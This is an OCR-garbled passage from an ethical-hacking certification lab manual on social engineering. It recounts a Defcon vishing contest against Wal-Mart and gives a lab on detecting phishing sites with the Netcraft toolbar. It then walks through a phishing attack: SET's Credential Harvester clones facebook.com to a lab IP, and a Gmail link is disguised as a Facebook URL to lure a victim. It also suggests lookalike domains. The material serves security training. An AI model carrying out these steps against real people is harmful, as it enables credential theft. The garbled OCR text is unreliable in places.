CEH Lab Manual Social Engineering Module 09 Module 09 - Social Engineering Social Engineering Social engineering is the art of convincingpeople to reveal confidential infonmtion I CON KEY / Valuable information ^ Test your Lab Scenario Source: http:/ / m onev.cnn.com /2012 /0 /O‫־־‬/technology/walm art-hackde Icon/index.litni Social engineering is essentially the art o f gaining access to buildings, systems, data by exploiting human psychology, rather than by breaking 111 01‫ ־‬using technical hacking techniques The term “social engineering” can also mean an attem pt to gain access to information, primarily through misrepresentation, and often relies 011 the trusting nature o f m ost individuals For example, instead o f trying to find software vulnerability, a social engineer might call an employee and pose as an IT support person, trying to tiick the employee into divulging 111s password 01‫־‬ *5 Web exercise £ Q Workbook revie Shane MacDougall, a hacker/security consultant, duped a Wal-Mart employee into giving 111111 inform ation that could be used 111 a hacker attack to win a coveted “black badge” 111 the “social engineering” contest at the D eleon hackers’ conference 111 Las Vegas 111 tins year's Capture the Flag social engineering contest at D eleon, champion Shane MacDougall used lying, a lucrative (albeit bogus) government contract, and 111s talent for self-effacing small talk to squeeze the following inform ation out o f Wal-Mart: ■ The small-town Canadian Wal-Mart store's janitorial contractor ■ Its cafeteria food-seivices provider ■ Its employee pay cycle ■ Its staff sliilt schedule ■ The time managers take then‫ ־‬breaks ■ W here they usually go for lunch ■ Type o f PC used by the manager ■ Make and version numbers o f the computer's operating system, and ■ Its web browser and antivirus software Stacy Cowley at CNNM oney wrote up the details o f how Wal-Mart got taken to the extent o f coughing up so m uch scam-worthy treasure 111 Calling from 111s sound-proofed booth at D eleon MacDougall placed an “urgent” call, broadcast to the entire D eleon audience, to a Wal-Mart store manager 111 Canada, introducing liiinsell as "G an‫ ־‬Darnell" from Wal-Mart's hom e oflice 111 Bentonville, Ark C E H L ab M an u al Page 675 E th ical H a ck in g a nd C o untenneasures Copyright © by EC-Council All Rights Reserved Reproduction is Stricdy Prohibited.] Module 09 - Social Engineering The role-playing visher (visliing being phone-based phishing) told the manager that Wal-Mart was looking at the possibility o f winning a multimillion-dollar government contract “Darnell'’ said that 111s job was to visit a few Wal-Mart stores that had been chosen as potential pilot locations But first, he told the store manager, he needed a thorough picture o f how the store operated 111 the conversation, which lasted about 10 minutes, “Darnell” described himself as a newly lured manager o f government logistics He also spoke offhand about the contract: “All I know is Wal-Mart can make a ton o f cash o ff it,” he said, then went on to talk about his upcom ing visit, keeping up a “ steady patter” about the project and life 111 Bentonville, Crowley writes As if tins wasn't bad enough, M acDougall/Darnell directed the manager to an external site to fill out a survey 111 preparation for 111s upcom ing visit The compliant manager obliged, plugging the address into 111s browser W hen his com puter blocked the connection, MacDougall didn't miss a beat, telling the manager that he'd call the IT departm ent and get the site unlocked After ending the call, stepping out o f the booth and accepting 111s well-earned applause, MacDougall became the first Capture the Flag champion to capture even‫ ״‬data point, or flag, on the competition checklist 111 the three years it has been held at Defcon D efcon gives contestants two weeks to research their targets Touchy inform ation such as social security numbers and credit card num bers are verboten, given that D efcon has no great desire to bring the law down on its head D efcon also keeps its nose clean by abstaining from recording the calls, which is against Nevada law However, there's no law against broadcasting calls live to an audience, which makes it legal for the D efcon audience to have listened as ]MacDougall pulled down Wal-Mart's pants MacDougall said, “Companies are way more aware about their security They’ve got firewalls, intrusion detection, log-in systems going into place, so it’s a lot harder for a hacker to break 111 these days, or to at least break in undetected So a bunch o f hackers now are going to the weakest link, and the link that companies just aren’t protecting, which is the people.”\ MacDougall also shared few best practices to be followed to avoid falling victim to a social engineer: C E H L ab M an u al Page 676 ■ Never be afraid to say no If something feels wrong, something is wrong ■ A 11 IT departm ent should never be calling asking about operating systems, machines, passwords or email systems— they already know E th ical H a ck in g a nd C ounterm easures Copyright © by EC-Council All Rights Reserved Reproduction is Stricdy Prohibited.] Module 09 - Social Engineering ■ Set up an internal company security word o f the day and don’t give any information to anyone who doesn’t know it ■ Keep tabs 011 w hat’s 011 the web Companies inadvertently release tons o f inform ation online, including through employees’ social media sites As an expert eth ical hacker and penetration tester, you should circulate the best practices to be followed among the employees & T o o ls dem onstrated in this lab are available in D:\CEHTools\CEHv8 Module 09 Social Engineering Lab Objectives The objective o f this lab is to: ■ D etect phishing sites ■ Protect the network from phishing attacks To earn* out tins lab, you need: ■ A computer mmnng Window Seiver 2012 ■ A web browser with Internet access Lab Duration Time: 20 Minutes » TASK Overview Overview Social Engineering Social engineering is die art of convincing people to reveal confidential information Social engineers depend 011 the fact that people are aware of certain valuable information and are careless 111 protecting it Lab Tasks Recommended labs to assist you 111 social engineering: ■ Social engineering ■ Detecting plushing using Netcraft ■ Detecting phishing using PliishTank Lab Analysis Analyze and document the results related to the lab exercise Give your opinion your target’s security posture and exposure 011 P L E A S E TALK T O Y OU R I N S T R U C T O R IF YOU HAV E Q U E S T I O N S R E L A T E D T O T H I S L AB C E H L ab M an u al Page 677 E th ical H a ck in g a nd C ounterm easures Copyright © by EC-Council All Rights Reserved Reproduction is Stricdy Prohibited.] Module 09 - Social Engineering Delecting Phishing Using Netcraft Netrmftprovides n‫׳‬eb server and n‫׳‬eb hosting warket-share analysis, including n'eb server and operating system detection I CON KEY Valuable / information ‫״*־‬v Test your *a Web exercise ffi! Workbook revi! Lab Scenario By now you are familiar with how social engineering is perform ed and what sort ot inform ation can be gathered by a social engineer Phishing is an example o f a social engineering technique used to deceive users, and it exploits the poor usability o f current web security technologies Phishing is the act o f attempting to acquire information such as user names, passwords, and credit card details (and sometimes, indirectly, money) by masquerading as a trustworthy entity in an electronic communication Communications claiming to be from popular social websites, auction sites, online payment processors, 01‫ ־‬IT administrators are commonly used to lure the unsuspecting public Phishing emails may contain links to websites that are infected with malware Phishing is typically carried out by email spoofing 01‫־‬ instant messaging and it often directs users to enter details at a fake website whose look and feel is almost identical to the legitimate one Phishers are targeting the customers o f banks and online payment services They send messages to the bank customers by manipulating URLs and website forger\T The messages sent claim to be from a bank and they look legitimate; users, not realizing that it is a fake website, provide their personal information and bank details N o t all phishing attacks require a fake website; messages that claim to be from a bank tell users to dial a phone num ber regarding problems with their bank accounts Once the phone num ber (owned by the plusher, and provided by a Voice over IP service) is dialed, it prom pts users to enter their account numbers and PIN Vishing (voice phishing) sometimes uses fake callerID data to give the appearance that calls come from a trusted organization Since you are an expert eth ical hacker and penetration tester, you m ust be aware o f phishing attacks occurring 011 the network and implement antiphishing measures 111 an organization, proper training must be provided to people to deal with phishing attacks 111 this lab you will be learning to detect phishing using Netcraft C E H L ab M an u al Page 678 E th ical H a ck in g a nd C ounterm easures Copyright © by EC-Council All Rights Reserved Reproduction is Stricdy Prohibited.] Module 09 - Social Engineering Lab Objectives T in s k b w ill sh o w y o u p h ish in g sites u sin g a w e b b ro w s e r a n d sh o w y o u h o w to use th e m I t w ill te a c h y o u h o w to: ■ D e te c t p h ish in g sites ■ P ro te c t th e n e tw o rk fro m p h ish in g attack T o carry o u t tins lab y o u need: ^ ~ T o o ls dem onstrated in this lab are available in D:\CEHTools\CEHv8 Module 09 Social Engineering ■ N etcraft is lo c a te d at D:\CEH-Tools\CEHv8 Module 09 Social Engineering\Anti-Phishing Toolbar\Netcraft Toolbar ■ Y o u can also d o w n lo a d th e la test v e rsio n o f Netcraft Toolbar fro m th e link h t t p : / /to o lb a r n e tc r a lt.c o m / ■ I f y o u d ecid e to d o w n lo a d th e la te st version, th e n sc re e n sh o ts sh o w n 111 th e lab m ig h t d iffer ■ A c o m p u te r ru n n in g W in d o w s S erv er 2012 ■ A w e b b ro w se r (F irefox, I n te r n e t ex p lo rer, etc.) w ith In te rn e t access ■ A d m in istra tiv e privileges to r u n th e N e tc r a lt to o lb a r Lab Duration Tim e: 10 M inutes Overview of N etcraft Toolbar N etc raft T o o lb a r provides Internet security services, including anti-fraud an d anti-phishing services, application testing, code reviews, au to m ated p en etratio n testing, and research data and analysis o n m an y aspects o f the Internet Lab Tasks ^ T A S K Anti-Phishing Tool bar C E H L ab M an u al Page 679 T o sta rt th is lab, y o u n e e d to la u n c h a w eb b ro w s e r first 111 this lab w e hav e u se d Mozilla Firefox L a u n c h th e Start m e n u by h o v e rin g th e m o u se c u rso r o n th e lo w er-left c o rn e r o f th e d esk to p E th ical H a ck in g a nd C ountem ieasures Copyright © by EC-Council All Rights Reserved Reproduction is Stricdy Prohibited.] Module 09 - Social Engineering JL ‫״‬ Q = J Y o u cau also download the Netcraft toolbar form h ttp ://toolbar.netcraft.com * | Windows Server 2012 Wiwfciwo “erfci2012 IUIc.m C1n4llMI( Dot*c«nV tiftlaatoncopv BmO MW FIGU RE 1.1: Windows Server 2012-Start Menu Click th e Mozilla Firefox ap p to la u n c h th e b ro w ser FIGU RE 1.2: Windows Server 2012-Start Menu Apps view N etcraft provides Internet security services, including anti-fraud and anti-phishing services T o d o w n lo a d th e Netcraft Toolbar fo r Mozilla Firefox, e n te r h t t p : / / to o lb a r.n e tc ft.c o m in th e ad d re ss b a r o f th e b ro w s e r o r d rag a n d d ro p th e netcraft_toolbar-1.7-fx.xpi file in F irefo x 111 tins lab, w e are d o w n lo a d in g th e to o lb a r Iro m th e In te rn e t 111 F ire fo x b ro w ser, click Download th e N etcraft Toolbar to install as th e ad d -o n ^ ‫ןזח‬ ‫ת‬ etc M i ft SINGLEH3 P ■‫ ן‬n , , M»tc‫׳‬-»ft Toolbar ‫• ■׳‬ Why u tt tn• Noicratt Toolbar? U Protect your tavinQf Irom I'hMhtnq attack*, a s«« the hoittnq totat)or1and Ukfc Matatq 01«‫י‬ O I1*lp defend 11*0 Internet community trooi tra FIGURE 1.3: Netcraft toolbar downloading Page C E H L ab M anual Page 680 E th ical H a ck in g a nd C o untenneasures Copyright © by EC-Council All Rights Reserved Reproduction is Stricdy Prohibited.] Module 09 - Social Engineering O n th e Install pag e o f th e N e tc ft T o o lb a r site, click th e Firefox im age to c o n tin u e w ith in stallatio n fc c P ‫ ־ » ״‬,.(■ ftO l nETCI^AFT D o w n lo a d N ow Netcraft Anti Phithing Toolbar & CQQ1 Netcraft is an Internet services company based in Bath, England System Raqiilramania FIGU RE 1.4: N etcraft toolbar Installation Page Click Allow to d o w n lo a d N e tc ft T o o lb a r ^ at ■ 10c*«.nen«rw •t font Hill• * ‫ם‬- J FIGU RE 1.8: Netcraft Toolbar on Mozilla Firefox web browser 12 W h e n y o u visit a site, th e fo llo w in g in fo rm a tio n displays 111 th e T o o lb a r (unless th e pag e h as b e e n b lo ck ed ): Risk rating, Rank, a n d Flag 13 Click S ite Report to sh o w th e r e p o rt o f th e site 0=5!Site report links to : detailed report for die FIGU RE 1.9: Report generated by N etcraft Toolbar 14 I f y o u a tte m p t to visit a p ag e th a t h as b e e n id e n tified as a p liish in g page by N e tc ft T o o lb a r y o u w ill see a warning dialog th a t lo o k s sim ilar to th e o n e in th e fo llo w in g figure 15 T ype, as an exam ple: h ttp : / / w w w pavpal.ca.6551 secu re7 c.m x / im ages / cgi.bin C E H L ab M anual Page 682 E th ical H a ck in g a nd C ounterm easures Copyright © by EC-Council All Rights Reserved Reproduction is Stricdy Prohibited.] Module 09 - Social Engineering £ Phishing a site feeds 0011011x1011517updated encrypted database of patterns diat match phishing URLs reported by the Netcraft Toolbar FIGU RE 1.10: Warning dialog for blocked site 16 I f y o u tru st th a t p ag e click Y es to o p e n it a n d i f y o u d o n ’t, click No (R ecom m ended) to b lo c k th a t page 17 I f y o u click No th e fo llo w in g p ag e w ill be displayed c !■!•!!‫■!ר‬ Coofb fi ft C- PhKMng S*o Hlockcxl %lll t‫»־־‬ - : m ; L ■ FIGURE 1.11: Web page blocked by Netcraft Toolbar Lab Analysis D o c u m e n t all die results an d rep o rt g athered d uring die lab T o o l/U tility N e tc r a f t I n f o r m a tio n C o l l e c t e d / O b j e c t i v e s A c h ie v e d ■ P h ish in g site d e te c te d P LEASE TALK TO YOUR I N S T R U C T O R IF YOU HAVE Q U E S T I O N S RE L A T E D TO T H I S LAB Questions C E H L ab M anual Page 683 E v alu ate w h e th e r th e N e tc ft T o o lb a r w o rk s i f y o u use a tra n sp a re n t proxy E th ical H a ck in g a nd C ounterm easures Copyright © by EC-Council All Rights Reserved Reproduction is Stricdy Prohibited.] Module 09 - Social Engineering jw $ 23 Windows Server 2012 Wndowa icrrct 2012 IUIe.m C«>vl!uatr D*t*cn» br5s _ FIGURE 3.4: Social Engineering Attacks menu 111 th e n e x t set o f m e n u s th a t ap p ears, type a n d p ress Enter to select th e Credential Harvester Attack Method File Edit View Terminal Help and th e B a ck|T rack team T h is method u t i l i z e s !fra m e replacem ents to make th e h ig h lig h te d URL l i n k to appear l e g it i m a te however *tf en c lic k e d a window pops up then i s re p la c e d w ith th e m a lic io u s l i n k You can e d i t th e l i n k replacem ent s e ttin g s in th e set^ c o n F ig i f i t s to n fc *k o « /fa s t T11e Credential Harvester M ethod will utilize web cloning o f a website that has a username and password field and harvest all die information posted to die website The M u lt i-A t t a c k method w i l l add a co m binatio n o f a tta c k s through th e web a tta c k Jr menu For example you can u t i l i z e th e Java A p p le t, M e ta s p lo it Browser, C r e d e n t ia l H a rv e s te r/T a b n a b b in g , and th e Man L e f t in th e M id d le a tta c k a l l a t once to see which i s s u c c e s s fu l m 1) Java A p p le t A tta c k Method 2) M e ta s p lo it Browser E x p lo it Method I3) Credential Harvester Attack Method | 4) Tabnabbing Attack Method ack ) Man l e f t i n th e M id d le A tta c k Method 6) Web Jacking A tta c k Method ) M u l t i - A t tack Web HethoJ 8) V ic tim Web P r o f i l e r ) C re a te o r im p o rt a CodeSigning C e r t i f i c a t e 99) Return to Main Menu s e t :w eb attackj3B FIGURE 3.5: website Attack Vectors menu C E H L ab M anual Page 693 U N o w , type an d p ress Enter to select th e S ite Cloner o p tio n fro m th e m enu E th ical H a ck in g a nd C ounterm easures Copyright © by EC-Council All Rights Reserved Reproduction is Stricdy Prohibited.] Module 09 - Social Engineering « T e rm in a l File Edit View Terminal Help ) C re a te o r im p o rt a CodeSigning M 99) R eturn to Main Menu C Q t 11e Site Cloner is used to d o n e a website o f your choice s e t : w e b a tta c k >3 The f i r s t method w i l l a llo w SET to im p o rt‫ *!' ׳‬l i s t o f p r e -d e fin e d web a p p lic a t io n s t h a t i t can u t i l i z e w it h in th e a t ta c k The second method w i l l c o m p le te ly c lo n e a w e b s ite o f your choosing and a llo w you to u t i l i z e th e a t ta c k v e c to rs w it h in th e c o m p le te ly same web a p p lic a t io n you were a tte m p tin g to c lo n e I h e t h i r d method aU ow s y o u jto im p o rt your own w e b s ip ;, n ote t ^ a t you Should o n ly have alt' in d e x h tm l when using th e im p o rt W ebsite Y jF f u n c t io n a lit y ^ ^ * 1) Web T em plates 12) S i t e C lo n e r ! 3) Custom Im p o rt ♦ v I I ^ I V •) / ‫׳‬ ‫י‬ ^ \ - ■«‫״‬ 99) R eturn to W ebattack Menu ;e t:w e b a tta c k a E f| _ FIGU RE 3.6: Credential Harvester Attack menu T y p e th e IP ad d ress o f y o u r B a ck T rac k v iru ia l P C 111 th e p r o m p t to r IP add ress for th e POST back in Harvester/Tabnabbing a n d p ress Enter 111 tins exam ple, th e IP is 10.0.0.15 * T e rm in a l File Edit View Terminal Help COS t 11e tabnabbing attack method is used when a victim has multiple tabs open, when the user clicks die link, die victim will be presented with a “Please wait while the page loads” W hen the victim switches tabs because h e/she is multi-tasking, the website detects that a different tab is present and rewrites die webpage to a website you specify The victim clicks back on the tab after a period o f time and diinks diey were signed out o f their email program or their business application and types the credentials in W hen the credentials are inserts, diey are harvested and the user is redirected back to the original website C E H L ab M anual Page 694 a p p lic a t io n s t h a t i t can u t i l i z e w it h in th e a t t a c k The second method w i l l c o m p le te ly c lo n e a w e b s ite o f your choosing and a llo w you to u t i l i z e th e a t ta c k v e c to rs w it h in th e co m p le te ly same web a p p lic a t io n you were a tte m p tin g to c lo n e The t h i r d method a llo w s you to im p o rt you r own w e b s ite , n ote t h a t you should o n ly have an in d e x h tm l when using th e im p o rt w e b s ite f u n c t io n a l it y 1) Web Tem plates ) S i t e C lo n e r 3) Custom Im p o rt _ 9 ) R eturn to W eb A ta c k Menu J[jLS‫־‬ir br I / * | ' ^ r3 t -1 C r e d e n tia l h a r v e s te r w i l t a llo w you to u t i l i z e th e clone c a p a b i l i t i e s w it h in set J ‫ן‬ [-1 t o h a rv e s t c r e d e n tia ls o r p aram eters from a w e b s ite as w e ll as p ie c e them in * to a re p o rt [-1 T h is o p tio n i s used f o r what IP th e s e r v e r w i l l POST t o [ -J I f y o u 'r e using an e x t e r n a l I P , use your e x t e r n a l IP f o r t h is : > IP address for the POST back in Harvester/Tabnabbina:110.0.0.15| FIGU RE 3.7: Providing IP address in H arvester/Tabnabbing N o w , y o u w ill be p ro m p te d fo r a U R L to b e clo n ed , type th e d esired U R L fo r Enter th e url to clo n e a n d p ress Enter 111 tin s ex am p le, w e h av e u se d w w w fa ceb o o k co m T in s w ill n n tia te th e clo n in g o f th e sp ecified w eb site E th ical H a ck in g a nd C o untenneasures Copyright © by EC-Council All Rights Reserved Reproduction is Stricdy Prohibited.] Module 09 - Social Engineering * T e rm in a l File Edit View Terminal Help and a llo w you to u t i l i z e th e a t ta c k v e c to rs w it h i n th e c o m p le te ly same web a p p lic a t io n you w ere a tte m p tin g t o c l o n e T ^ ^ ^ ^ ^ ^ ^ C Q t 11e web jacking attack method will create a website clone and present the victim with a link stating that the website has moved This is a new feature to version 0.7 The t h i r d method a llo w s you to im p o r t-y m jr own w e b s ite , n o te t h a t you should o n ly have an in d e x h tm l when usin g th e im p o rt w e b s ite f u n c t io n a l it y 1) Web Tem plates 2) S i t e C lo n e r 3) Custom Im p o rt 99) R eturn to W ebattack Menu [•] :w eb a tta c k >2 — C r e d e n tia l h a r v e s te r w i l l a llo w you to u t i l i z e J[ ‫] ־‬r to> h a rv e s t t h e c lo n e c a p a b il i t i e s w it h i r TJ T o r param eters f rom a w e b s ite as w e ll as p la c e them ir c r e d e n tia ls to a r e p o r t I ^ ■ % I % ■ I V J [-] T h is o p tio n i s used f o3r r A | hhaa t IP th e s e rv e r w i l l POST t o V ^ [■ ] I f y o u 'r e using an e x t e r n a l IP , use your e x t e r n a l IP f o r t h i s s e t :w eb a tta c k > IP address f o r th e POST back in H a rv e s te r/T a b n a b b in g : [ • ] SET sup ports both HTTP and HTTPS [ - ] Example: h t t p : //w w w t h is is a f a k e s i t e com ; e t :w eb atta ck> E n te r th e u r l to c lo n e :Rvww fa c e b o o k com! M FIGU RE 3.8: Providing URL to be cloned 10 A fte r clo n in g is c o m p le te d , th e h ig h lig h ted m essage, as sh o w n 111 th e follow ing sc re e n sh o t, w ill a p p e a r o n th e Terminal screen o t SET P ress Enter to co ntinue 11 I t w ill sta rt C red e n tia l H arv ester 1333If you ’re doing a penetration test, register a name that’s similar to the victim, for Gmail you could gmail.com (notice the 1), something similar diat can mistake the user into thinking it’s die legitimate File Edit View Terminal Help 99) R eturn to W ebattack Menu s e t :w e b a tta c k >2 [-1 C r e d e n t ia l h a r v e s te r w i l l a llo w you to u t i l i z e 51 th e c lo n e c a p a b il i t i e s w it h in SET [ - ] to h a rv e s t c r e d e n tia ls o r param eters from a w e b s ite as w e ll as p la c e them in to a r e p o rt [ - ] T h is o p tio n i s used f o r what IP th e s e r v e r w i l l POST t o t -J I f y o u 'r e using an e x t e r n a l I P , use you r e x t e r n a l IP f o r t h is s e t :w e b a tta c k > IP address f o r th e POST back i n H a rv e s te r /T a b n a b b in g :1 0 { - ] SET sup ports both HTTP and HTTPS I - ] Example: h t ://w w w th is is a f a k e s it e c o m I s e t : w e b a tta c k > E n te r th e u r l to c lo n e :www.facebook.com b [*] [*j ■ ‫—ך‬ C lo n in g th e w e b s ite : h t t p s ://lo g in fa c e b o o k c o m /lo g in p h p T h is cou ld ta k e a l i t t l e b i t I J Trie b e » « v Ttoaie fteu ■tfm k i J 11 f i e l d s a re a v a il a b l e R e g a rd le s s , K h i [ ! ] I have read th e above message Press < r e tu r i fo k c -‫י‬ , POSTs on a w e b s ite to c o n tin u e FIGU RE 3.9: SET Website Cloning 12 L eave th e C red e n tia l H a rv e ste r A tta c k to fetc h in fo rm a tio n fro m th e v ic tim ’s m achine C E H L ab M anual Page 695 E th ical H a ck in g a nd C ounterm easures Copyright © by EC-Council All Rights Reserved Reproduction is Stricdy Prohibited.] Module 09 - Social Engineering * T e rm in a l File Edit View Terminal Help m W hen you hover over the link, die URL will be presented with the real URL, not the attacker’s machine So for example if you’re cloning gmail.com, the URL w hen hovered over it would be gmail.com W hen die user clicks the moved link, Gmail opens and then is quickly replaced with your malicious Webserver Remember you can change the timing of the webjacking attack in die config/set_config flags [ - ] C r e d e n t ia l h a r v e s te r w i l l a llo w you to u t i l i z e th e c lo n e c a p a b i l i t i e s w it h in SET [ - ] t o h a rv e s t c r e d e n tia ls o r p aram eters from a w e b s ite as w e ll as p la c e them in to a r e p o rt —— [■ ] T h is o p tio n i s used f o r what IP th e s e r v e r w i l l POST t o _ * a * * ' [ - ] I f y o u 'r e using an e x t e r n a l I P , use you r e x t e r n a l IP f o r t h is s e t :w e b a tta c k > IP address f o r th e POST back i n H a r v e s t e r / T a b n a b b i n g : l # ^ ^ ^ ^ ^ [ - ] SET sup ports both HTTP and HTTPS [-1 Example: h t t p : //w w w th is is a f a k e s it e c o m s e t :w e b a tta c k > E n te r th e u r l to c lo n e :www.facebook.com [*] C lo n in g th e w e b s ite : h t t p s ://lo g in fa c e b o o k c o m /lo g in p h p could ta k e a l i t t l e b i t [*j T h is The bea t way to use t h i s a t t a c k i » i f f i e l d s f t r g ava i l a b l e R e j r d l e s s ■ h i I ' l l have read th e above message Press sername and pas sw o rd torm f t u r e s a l POSTs A a webs to co n tin u e ‫ ] ׳‬S o c ia l-E n g in e e r T o o lk i t C r e d e n t ia l H a rv e s te r A tta c k , j C r e d e n t ia l H a rv e s te r i s running on p o r t 80 ■] In fo rm a tio n w i l l be d is p la y e d to you as i t a r r iv e s below: FIGU R E 3.10: SET Credential Harvester Attack 13 N o w , y o u h a v e to se n d th e IP address o f y o u r B a ck T rack m a ch in e to a victim an d trick h im o r h e r to click to brow se th e IP ad d ress 14 F o r tins d em o , la u n c h y o u r w e b b ro w se r 111 th e B a ck T rack m a ch in e ; la u n c h y o u r fav o rite em ail service 111 th is ex am p le w e h av e u se d w w w gm ail.com L o g in to y o u r gm ail a c c o u n t a n d c o m p o se an email =5!Most o f die time they w on’t even notice the IP but it’s just another way to ensure it goes on w ithout a hitch N ow that the victim enters the username and password in die fields, you will notice that we can intercept the credentials now FIGURE 3.11: Composing email in Gmail 15 Place th e c u rso r 111 th e b o d y o f t 1e em ail w h e re y o u w ish to p lace th e lake U R L T h e n , click th e Link C E H L ab M anual Page 696 CO icon E th ical H a ck in g a nd C ounterm easures Copyright © by EC-Council All Rights Reserved Reproduction is Stricdy Prohibited.] Module 09 - Social Engineering ‫ א‬C o m p o s e M ail —« ‫־‬ 9) • >flma 1l.c o m * C m a il • M o z illa F ire to x Ejle Edit yiew History flook marks Ipols Help S' ‫ן‬ ^ f i http‫״‬ |Ba:kTrack Lnux l i * google.com/n^il, T C | 121▼ Google Gmail Documents Calendar More • G v ‫׳‬g l e Discard ° Inbox SUrrwJ Important Sert Mail Drafts (2) Q, nsiwe Security |lE x p lo it‫־‬DB ^A ircrack-n g J^SomaFM - Lab«h‫»־‬ + Share o Draft autosaveti at 10:4a AM (0 minutes ago) j@yahoo.com, I Add Cc Add Bcc Su bject @TOI F - Party Pictures Attach a no I ‫ ־‬b ►Circles y T ‫ ־‬rT * A ‫| © • ־ד ־‬o o |i= }= •5 is ‫י י‬ * * ^ I* « Plain Toxt chock spoiling■‫״‬ Hoilo Sam PI»4m» click this link lo view tt>*♦ w»#»kt»11d (vtrty pictures at TGIF wflh thw cmMxMim* Regards m Search chat or SU' 9‫«י‬ FIGURE 3.12: Linking Fake URL to Actual URL 16 111 th e Edit Link w in d o w , first type th e actu al ad d ress in th e Web add ress field u n d e r th e Link to o p tio n a n d th e n type th e fake U R L 111 th e T ext to display held 111 tins ex am p le, th e w eb ad d re ss w e h av e u se d is http://10 0.0.15 a n d tex t to d isplay is w w w facebook.com /R ini TGIF C lick OK ‫׳־י‬ tile ‫ א‬C o m p o s e M ail ‫ •■■■ ■■«omaFM »Rlni Search Images Maps Play YouTube G o )g Ie Draft eutosaved at 10:45 AM (0 minutes ago) Inbox Starred Important Sent Ma! Drafts (2) E d it Link Circles U r* to X Toxt to aiepiay: L w (vfacehook coaVRinl TGIf J Q JunkE-mal To what URL should this link go? Web address |wtp0.0.15 10‫־‬/‫ | ׳‬Q C Email * * ♦‫י י•־‬ T*‫>״‬l this in* Not sure wrhat lo pul In the boxT r m fhd t**■imgean the t*ob far you wanr lo Ink to (A acarcAcnainc nvotit be useful.) Then coo rtc acb addNsa from me box h your browser's acMroso Qor and potto it 140 tno box aoov• | OK | Cared FIGU RE 3.13: Edit Link window 17 T h e fake U R L sh o u ld a p p e a r 111 th e em ail b o d y , as sh o w n 111 th e follow ing screen sh o t C E H L ab M anual Page 697 E th ical H a ck in g a nd C ounterm easures Copyright © by EC-Council All Rights Reserved Reproduction is Stricdy Prohibited.] Module 09 - Social Engineering Ejle Edit ‫ א‬Com pose Mail ‫—» ־‬ • (g>gma1l.com * Cmail • Mozilla Firefox History flook marks Ipols Help |Ba:kTrack Linux |*|Offensive Security |[JjExploit-DB ^A ircrack-n g jgjjSomaFM G v ‫׳‬g l e Saved c a The Credential Harvester M ethod will utilize web cloning o f a website that has a username and password field and harvest all die information posted to the website Discard To Labels •»‫־‬ Draft autnsaved at 11:01 AM (0 minutes ago) ‫־‬ B @yahoo com, Inbox Add Cc Add Bcc SUrred Important Sert Mail Drafts (2) (QTGIF - Party Pictures Subjed Attach a 10‫ת‬ ►Circles I Sf ‫ ־‬B U T - »T - A, • T - © oo | - IE is H « =3 ^ , piain roxt chock spoiling■' hello Sam P1-*m» click this Ilfikj ivivw U:»|>r11* t: